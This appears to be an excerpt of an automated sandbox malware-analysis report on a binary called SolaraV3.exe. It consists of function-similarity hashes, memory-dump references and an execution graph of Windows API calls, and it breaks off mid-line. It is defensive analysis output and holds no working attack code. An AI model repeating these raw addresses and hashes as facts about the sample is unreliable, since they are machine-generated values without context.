                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                              • Instruction ID: 50d53b75fb76f07c055c764a682fe6b2492e9f35f77b94a09d3338bf0f5a05a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED412B22A1828A46FBB18B25D52137DA755EB80BA8F144237EE5C87BD5DF3CD4A38700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC719046
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6DC70CBA5), ref: 00007FF6DC719064
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-3821142706
                                                                                                                                                                                                                              • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                              • Instruction ID: cf413cdc6034cf69c3cfac53a21962f8c7e91602477c9449305620ca662dacc8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A419332A08B0A85EB16DF29D4610BD67A4EF457E0B556037EA4E87B85DF3DE4A3C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                              • Instruction ID: 95180ee3ee2303403aed47978d376b4598dc0a8f2f4035bad47d2dd0ca4144db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF41C532728A5985DB208F69E4553AD6761FB88784F545132EE8DC7794EF3CD412CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                              • Instruction ID: 8cff24189984a63b990c5bd06bcecd1fed1e8df0bfbff823a69f48a4aef32553
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4210772B0868581FB209B19D06427D73B1FB88B84F554137EA8D83694DF7CE966CB41
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction ID: 4f0d37246fc5bd33a2aace6ee8c0f80a4060b6ed5d7b79440687495ec39ed506
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF112E32618B8582EB618F15E45025DB7E5FB88B84F584231EB8D47754DF3DD562C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction ID: b338db340c7240531f884c48a7cc9dc90d0fe9680b0080e81536ea76b986b95a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7018F22A1820A86FB30AF64947537EA7A0EF48744F941037D68DC2795EE2CE5268B24

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:1.8%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:1.1%
                                                                                                                                                                                                                              Total number of Nodes:710
                                                                                                                                                                                                                              Total number of Limit Nodes:21
                                                                                                                                                                                                                              execution_graph 97063 7ffb0c35b360 97066 7ffb0c35b37f 97063->97066 97065 7ffb0c35b4e2 97066->97065 97067 7ffb0c351253 97066->97067 97067->97065 97070 7ffb0c35dcd0 97067->97070 97068 7ffb0c35dd4e SetLastError 97069 7ffb0c35dda6 97068->97069 97068->97070 97069->97065 97070->97068 97070->97069 97071 7ffb0bb66ee0 97072 7ffb0bb66ef8 97071->97072 97077 7ffb0bb67ad6 97071->97077 97073 7ffb0bb679e3 LoadLibraryA 97072->97073 97076 7ffb0bb67a3e VirtualProtect VirtualProtect 97072->97076 97074 7ffb0bb679fd 97073->97074 97074->97072 97078 7ffb0bb67a1c GetProcAddress 97074->97078 97076->97077 97077->97077 97078->97074 97079 7ffb0bb67a33 97078->97079 97974 7ffb0c367eb0 97975 7ffb0c3512ee 97974->97975 97976 7ffb0c367ed0 SetLastError 97975->97976 97977 7ffb0c367ef7 97976->97977 97980 7ffb0c351b4a 97977->97980 97978 7ffb0c367f39 97980->97978 97982 7ffb0c35c410 97980->97982 97983 7ffb0c35c4ef 97982->97983 97984 7ffb0c396905 SetLastError 97982->97984 97985 7ffb0c351cf8 SetLastError 97982->97985 97986 7ffb0c35146a SetLastError 97982->97986 97987 7ffb0c35195b 97982->97987 97983->97978 97984->97982 97985->97982 97986->97982 97987->97982 97989 7ffb0c360120 97987->97989 97988 7ffb0c351497 SetLastError 97988->97989 97989->97988 97990 7ffb0c360d72 97989->97990 97996 7ffb0c360294 97989->97996 97991 7ffb0c360d7f 00007FFB2ADB6570 97990->97991 97990->97996 97992 7ffb0c360da0 00007FFB2ADB6570 97991->97992 97991->97996 97993 7ffb0c360dc0 00007FFB2ADB6570 97992->97993 97992->97996 97994 7ffb0c360ddb 00007FFB2ADB6570 97993->97994 97993->97996 97995 7ffb0c360df3 00007FFB2ADB6570 97994->97995 97994->97996 97995->97996 97996->97982 97997 7ff6dc715628 97998 7ff6dc71565f 97997->97998 97999 7ff6dc715642 97997->97999 97998->97999 98001 7ff6dc715672 CreateFileW 97998->98001 98022 7ff6dc714ee8 11 API calls _set_fmode 97999->98022 98003 7ff6dc7156a6 98001->98003 98004 7ff6dc7156dc 98001->98004 98002 7ff6dc715647 98023 7ff6dc714f08 11 API calls _set_fmode 98002->98023 98025 7ff6dc71577c 59 API calls 3 library calls 98003->98025 98026 7ff6dc715c04 46 API calls 3 library calls 98004->98026 98008 7ff6dc7156e1 98011 7ff6dc715710 98008->98011 98012 7ff6dc7156e5 98008->98012 98009 7ff6dc71564f 98024 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 98009->98024 98010 7ff6dc7156b4 98014 7ff6dc7156bb CloseHandle 98010->98014 98015 7ff6dc7156d1 CloseHandle 98010->98015 98028 7ff6dc7159c4 51 API calls 98011->98028 98027 7ff6dc714e7c 11 API calls 2 library calls 98012->98027 98018 7ff6dc71565a 98014->98018 98015->98018 98019 7ff6dc71571d 98029 7ff6dc715b00 21 API calls _fread_nolock 98019->98029 98021 7ff6dc7156ef 98021->98018 98022->98002 98023->98009 98024->98018 98025->98010 98026->98008 98027->98021 98028->98019 98029->98021 98030 7ffb0c37f870 98031 7ffb0c37f88a 98030->98031 98032 7ffb0c37f8a0 98031->98032 98034 7ffb0c351f32 98031->98034 98034->98032 98035 7ffb0c368350 98034->98035 98036 7ffb0c36836a SetLastError 98035->98036 98037 7ffb0c368391 98036->98037 98037->98032 97080 7ffb0c377140 97081 7ffb0c377150 97080->97081 97082 7ffb0c377160 97081->97082 97086 7ffb0c396905 97081->97086 97090 7ffb0c351cf8 97081->97090 97094 7ffb0c35146a 97081->97094 97087 7ffb0c39690e 97086->97087 97088 7ffb0c396a5f SetLastError 97087->97088 97089 7ffb0c396a73 97087->97089 97088->97089 97089->97082 97090->97082 97091 7ffb0c396340 97090->97091 97092 7ffb0c396a5f SetLastError 97091->97092 97093 7ffb0c396a73 97091->97093 97092->97093 97093->97082 97094->97082 97095 7ffb0c396220 97094->97095 97096 7ffb0c396a5f SetLastError 97095->97096 97097 7ffb0c396a73 97095->97097 97096->97097 97097->97082 98038 7ff6dc702fe0 98039 7ff6dc702ff0 98038->98039 98040 7ff6dc703041 98039->98040 98041 7ff6dc70302b 98039->98041 98043 7ff6dc703061 98040->98043 98053 7ff6dc703077 __vcrt_freefls 98040->98053 98066 7ff6dc702710 54 API calls _log10_special 98041->98066 98067 7ff6dc702710 54 API calls _log10_special 98043->98067 98045 7ff6dc70c550 _log10_special 8 API calls 98046 7ff6dc7031fa 98045->98046 98047 7ff6dc701470 116 API calls 98047->98053 98048 7ff6dc703349 98074 7ff6dc702710 54 API calls _log10_special 98048->98074 98049 7ff6dc701c80 49 API calls 98049->98053 98051 7ff6dc703333 98073 7ff6dc702710 54 API calls _log10_special 98051->98073 98053->98047 98053->98048 98053->98049 98053->98051 98054 7ff6dc70330d 98053->98054 98056 7ff6dc703207 98053->98056 98065 7ff6dc703037 __vcrt_freefls 98053->98065 98072 7ff6dc702710 54 API calls _log10_special 98054->98072 98057 7ff6dc703273 98056->98057 98068 7ff6dc71a404 37 API calls 2 library calls 98056->98068 98059 7ff6dc703290 98057->98059 98060 7ff6dc70329e 98057->98060 98069 7ff6dc71a404 37 API calls 2 library calls 98059->98069 98070 7ff6dc702dd0 37 API calls 98060->98070 98063 7ff6dc70329c 98071 7ff6dc702500 54 API calls __vcrt_freefls 98063->98071 98065->98045 98066->98065 98067->98065 98068->98057 98069->98063 98070->98063 98071->98065 98072->98065 98073->98065 98074->98065 97098 7ff6dc70b81c 97099 7ff6dc70ab1a 97098->97099 97101 7ff6dc70ab96 97099->97101 97102 7ff6dc70bd90 97099->97102 97103 7ff6dc70bdb3 97102->97103 97104 7ff6dc70bdd1 memcpy_s 97102->97104 97106 7ff6dc71d5fc 97103->97106 97104->97101 97107 7ff6dc71d647 97106->97107 97111 7ff6dc71d60b _set_fmode 97106->97111 97114 7ff6dc714f08 11 API calls _set_fmode 97107->97114 97109 7ff6dc71d62e HeapAlloc 97110 7ff6dc71d645 97109->97110 97109->97111 97110->97104 97111->97107 97111->97109 97113 7ff6dc723590 EnterCriticalSection LeaveCriticalSection _set_fmode 97111->97113 97113->97111 97114->97110 97115 7ff6dc70cc3c 97136 7ff6dc70ce0c 97115->97136 97118 7ff6dc70cd88 97287 7ff6dc70d12c 7 API calls 2 library calls 97118->97287 97119 7ff6dc70cc58 __scrt_acquire_startup_lock 97121 7ff6dc70cd92 97119->97121 97128 7ff6dc70cc76 __scrt_release_startup_lock 97119->97128 97288 7ff6dc70d12c 7 API calls 2 library calls 97121->97288 97123 7ff6dc70cc9b 97124 7ff6dc70cd9d _CallSETranslator 97125 7ff6dc70cd21 97142 7ff6dc70d274 97125->97142 97127 7ff6dc70cd26 97145 7ff6dc701000 97127->97145 97128->97123 97128->97125 97284 7ff6dc719b2c 45 API calls 97128->97284 97133 7ff6dc70cd49 97133->97124 97286 7ff6dc70cf90 7 API calls 97133->97286 97135 7ff6dc70cd60 97135->97123 97137 7ff6dc70ce14 97136->97137 97138 7ff6dc70ce20 __scrt_dllmain_crt_thread_attach 97137->97138 97139 7ff6dc70cc50 97138->97139 97140 7ff6dc70ce2d 97138->97140 97139->97118 97139->97119 97140->97139 97289 7ff6dc70d888 7 API calls 2 library calls 97140->97289 97290 7ff6dc72a4d0 97142->97290 97146 7ff6dc701009 97145->97146 97292 7ff6dc715484 97146->97292 97148 7ff6dc7037fb 97299 7ff6dc7036b0 97148->97299 97154 7ff6dc70383c 97398 7ff6dc701c80 97154->97398 97155 7ff6dc70391b 97403 7ff6dc7045c0 97155->97403 97159 7ff6dc70385b 97371 7ff6dc708830 97159->97371 97162 7ff6dc70396a 97426 7ff6dc702710 54 API calls _log10_special 97162->97426 97164 7ff6dc70388e 97172 7ff6dc7038bb __vcrt_freefls 97164->97172 97402 7ff6dc7089a0 40 API calls __vcrt_freefls 97164->97402 97166 7ff6dc70395d 97167 7ff6dc703984 97166->97167 97168 7ff6dc703962 97166->97168 97170 7ff6dc701c80 49 API calls 97167->97170 97422 7ff6dc71004c 97168->97422 97173 7ff6dc7039a3 97170->97173 97174 7ff6dc708830 14 API calls 97172->97174 97181 7ff6dc7038de __vcrt_freefls 97172->97181 97178 7ff6dc701950 115 API calls 97173->97178 97174->97181 97176 7ff6dc703a0b 97429 7ff6dc7089a0 40 API calls __vcrt_freefls 97176->97429 97180 7ff6dc7039ce 97178->97180 97179 7ff6dc703a17 97430 7ff6dc7089a0 40 API calls __vcrt_freefls 97179->97430 97180->97159 97183 7ff6dc7039de 97180->97183 97187 7ff6dc70390e __vcrt_freefls 97181->97187 97428 7ff6dc708940 40 API calls __vcrt_freefls 97181->97428 97427 7ff6dc702710 54 API calls _log10_special 97183->97427 97184 7ff6dc703a23 97431 7ff6dc7089a0 40 API calls __vcrt_freefls 97184->97431 97188 7ff6dc708830 14 API calls 97187->97188 97189 7ff6dc703a3b 97188->97189 97190 7ff6dc703b2f 97189->97190 97191 7ff6dc703a60 __vcrt_freefls 97189->97191 97433 7ff6dc702710 54 API calls _log10_special 97190->97433 97204 7ff6dc703aab 97191->97204 97432 7ff6dc708940 40 API calls __vcrt_freefls 97191->97432 97194 7ff6dc708830 14 API calls 97195 7ff6dc703bf4 __vcrt_freefls 97194->97195 97196 7ff6dc703d41 97195->97196 97197 7ff6dc703c46 97195->97197 97447 7ff6dc7044e0 49 API calls 97196->97447 97198 7ff6dc703cd4 97197->97198 97199 7ff6dc703c50 97197->97199 97202 7ff6dc708830 14 API calls 97198->97202 97434 7ff6dc7090e0 59 API calls _log10_special 97199->97434 97206 7ff6dc703ce0 97202->97206 97203 7ff6dc703d4f 97207 7ff6dc703d65 97203->97207 97208 7ff6dc703d71 97203->97208 97204->97194 97205 7ff6dc703c55 97209 7ff6dc703cb3 97205->97209 97210 7ff6dc703c61 97205->97210 97206->97210 97213 7ff6dc703ced 97206->97213 97448 7ff6dc704630 97207->97448 97212 7ff6dc701c80 49 API calls 97208->97212 97445 7ff6dc708660 86 API calls 2 library calls 97209->97445 97435 7ff6dc702710 54 API calls _log10_special 97210->97435 97225 7ff6dc703d2b __vcrt_freefls 97212->97225 97217 7ff6dc701c80 49 API calls 97213->97217 97215 7ff6dc703cbb 97220 7ff6dc703cbf 97215->97220 97221 7ff6dc703cc8 97215->97221 97222 7ff6dc703d0b 97217->97222 97218 7ff6dc703dbc 97384 7ff6dc709390 97218->97384 97220->97210 97221->97225 97224 7ff6dc703d12 97222->97224 97222->97225 97223 7ff6dc703dcf SetDllDirectoryW 97229 7ff6dc703e02 97223->97229 97274 7ff6dc703e52 97223->97274 97446 7ff6dc702710 54 API calls _log10_special 97224->97446 97225->97218 97226 7ff6dc703da7 LoadLibraryExW 97225->97226 97226->97218 97232 7ff6dc708830 14 API calls 97229->97232 97230 7ff6dc703808 __vcrt_freefls 97436 7ff6dc70c550 97230->97436 97231 7ff6dc704000 97234 7ff6dc70402d 97231->97234 97235 7ff6dc70400a PostMessageW GetMessageW 97231->97235 97240 7ff6dc703e0e __vcrt_freefls 97232->97240 97233 7ff6dc703f13 97459 7ff6dc7033c0 121 API calls 2 library calls 97233->97459 97389 7ff6dc703360 97234->97389 97235->97234 97237 7ff6dc703f1b 97237->97230 97238 7ff6dc703f23 97237->97238 97460 7ff6dc7090c0 LocalFree 97238->97460 97243 7ff6dc703eea 97240->97243 97247 7ff6dc703e46 97240->97247 97458 7ff6dc708940 40 API calls __vcrt_freefls 97243->97458 97247->97274 97451 7ff6dc706dc0 54 API calls _set_fmode 97247->97451 97250 7ff6dc704047 97462 7ff6dc706fc0 FreeLibrary 97250->97462 97255 7ff6dc704053 97256 7ff6dc703e64 97452 7ff6dc707340 117 API calls 2 library calls 97256->97452 97260 7ff6dc703e79 97263 7ff6dc703e9a 97260->97263 97275 7ff6dc703e7d 97260->97275 97453 7ff6dc706e00 120 API calls _log10_special 97260->97453 97263->97275 97454 7ff6dc7071b0 125 API calls 97263->97454 97267 7ff6dc703eaf 97267->97275 97455 7ff6dc7074f0 55 API calls 97267->97455 97269 7ff6dc703ed8 97457 7ff6dc706fc0 FreeLibrary 97269->97457 97274->97231 97274->97233 97275->97274 97456 7ff6dc702a50 54 API calls _log10_special 97275->97456 97284->97125 97285 7ff6dc70d2b8 GetModuleHandleW 97285->97133 97286->97135 97287->97121 97288->97124 97289->97139 97291 7ff6dc70d28b GetStartupInfoW 97290->97291 97291->97127 97296 7ff6dc71f480 97292->97296 97293 7ff6dc71f4d3 97463 7ff6dc71a814 37 API calls 2 library calls 97293->97463 97295 7ff6dc71f526 97464 7ff6dc71f358 71 API calls _fread_nolock 97295->97464 97296->97293 97296->97295 97298 7ff6dc71f4fc 97298->97148 97465 7ff6dc70c850 97299->97465 97302 7ff6dc703710 97467 7ff6dc709280 FindFirstFileExW 97302->97467 97303 7ff6dc7036eb GetLastError 97472 7ff6dc702c50 51 API calls _log10_special 97303->97472 97306 7ff6dc703706 97311 7ff6dc70c550 _log10_special 8 API calls 97306->97311 97308 7ff6dc703723 97473 7ff6dc709300 CreateFileW GetFinalPathNameByHandleW CloseHandle 97308->97473 97309 7ff6dc70377d 97475 7ff6dc709440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 97309->97475 97314 7ff6dc7037b5 97311->97314 97313 7ff6dc70378b 97313->97306 97476 7ff6dc702810 49 API calls _log10_special 97313->97476 97314->97230 97321 7ff6dc701950 97314->97321 97315 7ff6dc703730 97316 7ff6dc703734 97315->97316 97317 7ff6dc70374c __vcrt_InitializeCriticalSectionEx 97315->97317 97474 7ff6dc702810 49 API calls _log10_special 97316->97474 97317->97309 97320 7ff6dc703745 97320->97306 97322 7ff6dc7045c0 108 API calls 97321->97322 97323 7ff6dc701985 97322->97323 97324 7ff6dc701c43 97323->97324 97326 7ff6dc707f90 83 API calls 97323->97326 97325 7ff6dc70c550 _log10_special 8 API calls 97324->97325 97327 7ff6dc701c5e 97325->97327 97328 7ff6dc7019cb 97326->97328 97327->97154 97327->97155 97370 7ff6dc701a03 97328->97370 97477 7ff6dc7106d4 97328->97477 97330 7ff6dc71004c 74 API calls 97330->97324 97331 7ff6dc7019e5 97332 7ff6dc7019e9 97331->97332 97333 7ff6dc701a08 97331->97333 97484 7ff6dc714f08 11 API calls _set_fmode 97332->97484 97481 7ff6dc71039c 97333->97481 97337 7ff6dc7019ee 97485 7ff6dc702910 54 API calls _log10_special 97337->97485 97339 7ff6dc701a45 97344 7ff6dc701a5c 97339->97344 97345 7ff6dc701a7b 97339->97345 97340 7ff6dc701a26 97486 7ff6dc714f08 11 API calls _set_fmode 97340->97486 97342 7ff6dc701a2b 97487 7ff6dc702910 54 API calls _log10_special 97342->97487 97488 7ff6dc714f08 11 API calls _set_fmode 97344->97488 97346 7ff6dc701c80 49 API calls 97345->97346 97348 7ff6dc701a92 97346->97348 97351 7ff6dc701c80 49 API calls 97348->97351 97349 7ff6dc701a61 97489 7ff6dc702910 54 API calls _log10_special 97349->97489 97352 7ff6dc701add 97351->97352 97353 7ff6dc7106d4 73 API calls 97352->97353 97354 7ff6dc701b01 97353->97354 97355 7ff6dc701b35 97354->97355 97356 7ff6dc701b16 97354->97356 97357 7ff6dc71039c _fread_nolock 53 API calls 97355->97357 97490 7ff6dc714f08 11 API calls _set_fmode 97356->97490 97359 7ff6dc701b4a 97357->97359 97361 7ff6dc701b50 97359->97361 97362 7ff6dc701b6f 97359->97362 97360 7ff6dc701b1b 97491 7ff6dc702910 54 API calls _log10_special 97360->97491 97492 7ff6dc714f08 11 API calls _set_fmode 97361->97492 97494 7ff6dc710110 97362->97494 97366 7ff6dc701b55 97493 7ff6dc702910 54 API calls _log10_special 97366->97493 97370->97330 97372 7ff6dc70883a 97371->97372 97373 7ff6dc709390 2 API calls 97372->97373 97374 7ff6dc708859 GetEnvironmentVariableW 97373->97374 97375 7ff6dc708876 ExpandEnvironmentStringsW 97374->97375 97376 7ff6dc7088c2 97374->97376 97375->97376 97377 7ff6dc708898 97375->97377 97378 7ff6dc70c550 _log10_special 8 API calls 97376->97378 97532 7ff6dc709440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 97377->97532 97380 7ff6dc7088d4 97378->97380 97380->97164 97381 7ff6dc7088aa 97382 7ff6dc70c550 _log10_special 8 API calls 97381->97382 97383 7ff6dc7088ba 97382->97383 97383->97164 97385 7ff6dc7093b2 MultiByteToWideChar 97384->97385 97387 7ff6dc7093d6 97384->97387 97385->97387 97388 7ff6dc7093ec __vcrt_freefls 97385->97388 97386 7ff6dc7093f3 MultiByteToWideChar 97386->97388 97387->97386 97387->97388 97388->97223 97533 7ff6dc706360 97389->97533 97393 7ff6dc703381 97397 7ff6dc703399 97393->97397 97601 7ff6dc706050 97393->97601 97395 7ff6dc70338d 97395->97397 97610 7ff6dc7061e0 54 API calls 97395->97610 97461 7ff6dc703670 FreeLibrary 97397->97461 97399 7ff6dc701ca5 97398->97399 97749 7ff6dc714984 97399->97749 97402->97172 97404 7ff6dc7045cc 97403->97404 97405 7ff6dc709390 2 API calls 97404->97405 97406 7ff6dc7045f4 97405->97406 97407 7ff6dc709390 2 API calls 97406->97407 97408 7ff6dc704607 97407->97408 97776 7ff6dc715f94 97408->97776 97411 7ff6dc70c550 _log10_special 8 API calls 97412 7ff6dc70392b 97411->97412 97412->97162 97413 7ff6dc707f90 97412->97413 97414 7ff6dc707fb4 97413->97414 97415 7ff6dc7106d4 73 API calls 97414->97415 97420 7ff6dc70808b __vcrt_freefls 97414->97420 97416 7ff6dc707fd0 97415->97416 97416->97420 97944 7ff6dc7178c8 97416->97944 97418 7ff6dc7106d4 73 API calls 97421 7ff6dc707fe5 97418->97421 97419 7ff6dc71039c _fread_nolock 53 API calls 97419->97421 97420->97166 97421->97418 97421->97419 97421->97420 97423 7ff6dc71007c 97422->97423 97960 7ff6dc70fe28 97423->97960 97425 